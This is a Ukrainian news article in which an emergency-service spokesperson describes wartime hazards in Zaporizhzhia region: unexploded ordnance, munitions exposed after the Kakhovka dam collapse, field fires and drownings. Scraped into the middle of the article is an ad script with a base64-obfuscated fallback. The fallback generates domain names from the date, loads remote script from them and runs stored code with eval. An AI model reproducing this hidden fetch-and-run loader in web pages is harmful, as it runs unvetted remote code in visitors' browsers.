Важные новости

Небезпека на пляжах, у полях та від обстрілів: у ДСНС розповіли про актуальні загрози для запоріжців

Майже півтора роки повномасштабної війни й регулярні обстріли з боку країни-агресорки створили небезпечні умови для життя жителів Запоріжжя, а особливо для жителів області. Однак до цих небезпек додалися також наслідки катастрофи на Каховській ГЕС, відвідування пляжів попри заборону й сезон пожеж на відкритих територіях.

Речниця ГУ ДСНС України в Запорізькій області Юлія Баришева розповіла про основні небезпеки й правила захисту.

Сьогодній у нас дуже великий арсенал вибухонебезпечних предметів на території Запорізької області, який викидує до нас країна-агресор, і не тільки на голови наших військоких, а й по мирному населенню. Саме тому ми посилюємо роз’яснювальну роботу стосовно мінної безпеки. На сьогодні я вважаю це питання чи не найактуальнішим серед усіх питань стосовно безпеки. Літній спектр ризиків у цивільній інфраструктурі нікуди не дівся (водойми, загоряння на відкритих територіях і т.д.). Але зараз тема мінної безпеки стала найголовнішою, бо будь-яка необережна дія може стати фатальною.

Про особливості знешкодження боєприпасів і види вибухонебезпечних предметів.

Нещодавно розмінували керовану авіабомбу ФАБ-500, яка прилетіла й не розірвалася. Навіть їхня зброя відмовляється воювати на нашій землі. У ворога дуже багатий арсенал зброї, як сучасної так і часів Другої світової війни. Вони використовують все, що в них є. Через це дуже багато є відмов у спрацюванні, й ми не знаємо як поведе себе цей вибухонебезпечний предмет, якщо він долетів і не розірвався. Коли він може спрацювати — абсолютно непередбачувано.

Як поводитися при виявленні такого предмету.

Жителі прифронтових районів мають строго виконувати правила безпеки. Побачили предмет — відійшли від нього тим же шляхом. Не треба бігти, намагатися пересунути чи прибрати зі шляху, робити якісь механічні дії. Радіус розльоту уламків може бути від 50-ти до 500 метрів.

Наші техніки доволі фахові і проводять розмінування будь-де, вони розуміються в тому, які предмети можна перевозити, а які потребують ліквідації на місці виявлення. Наприклад, касетний елемент розлітається з системи залпового вогню «Ураган», «Смерч» і має терміни спрацювання від 48 годин до 72 годин. Якщо такі касетні елементи висипалися на певній ділянці, то 72 години до них не можна підходити. Є дуже слушний приклад, які розповідали наші колеги з Донецької і Луганської областей. Один необізнаний громадянин назбирав 5 касетних елементів, які мали спеціальні парашутики для приземлення. Потім приніс їх не плечі до сусіда, щоб показати знахідку, і в цей момент вони розірвалися. Обидві людини загинули.

Як змінилася діяльність фахівців ДСНС після відходу води.

Знаходили нещодавно навіть вибухонебезпечні предмети часів Першої світової війни. Увесь цей час предмет лежав у воді, яка була для нього консервантом, його ніхто не чіпав. Після руйнування Каховської ГЕС наші спеціалісти щодня виїжджають на узбережжя Дніпра, бо усі вибухонебезпечні, які довгий час перебували на дні наразі опинилися на поверхні. За нормами, якщо ми виявили на березі предмет, то маємо обстежити квадрат 100 на 100 метрів у воді та навколо. Саме тому до сухопутних піротехніків долучаються також водолази спеціального призначення. З 6 червня піротехніки виїжджали майже 40 разів і вилучили 80 вибухонебезпечних предметів часів Першої та Другої світових війн. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Як відбувається співпраця з аграріями.

Застрахувати поля і аграріїв на сьогоднішній день неможливо. Прилетіти може коли і куди завгодно. Перед початком посівної кампанії було обстежено з дронів поля, а зараз все це відбувається хаотично з боку країни-агресорки. Дуже багато полів на межі зіткнення просто вигоріли, тому що ліквідовувати пожежі в таких місцях дуже складно. Тому звертаємося до усіх аграріїв дбати про безпеку, мати бронежилети, каски, які дозволять зберегти життя. Також після прильотів неможна посилати людей на збиральну кампанію, ні в якому разі неможна ігнорувати сигнали повітряної тривоги.

Про безпеку на воді.

На превеликий жаль, у поточному році потонуло вже 13 людей. Це відбувається через недбалість, ігнорування попереджень і незнання елементарних безпекових правил. Також нагадуємо, що не можна купатися на пляжах, адже вони не проходили в цьому році спеціальну перевірку. Зазвичай, спеціалісти обстежували дно, прибирали предмети, які могли намити під час зими. Саме тому навіть ті пляжі, які були перевірені в минулому році, зараз можуть бути небезпечними. На перевірки зараз просто немає часу, оскільки дуже багато інших проблем. Місцева влада також заборонила відвідування пляжів, зокрема й через спалахи кишкових хвороб.

Пожежі на відкритих територіях.

З початку року вже 183 пожежі на відкритих територіях області, знищено 67,5 га.

Робота у прифронтових районах.

Дуже багато обстрілів, виїздів. Чотири підрозділи зараз працюють цілодобово на лінії зіткнення. Вони їдуть на з Запоріжжя, а ведть чергування у пожежно-рятувальних частинах прифронтових міст. Хлопці під постійним ризиком та обстрілами, але виконують свій обов’язок.

Джерело: 5-та редакція. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/nebezpeka-na-plyazhah-u-polyah-ta-vid-obstriliv-u-dsns-rozpovili-pro-aktualni-zagrozi-dlya-zaporizhtsiv/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top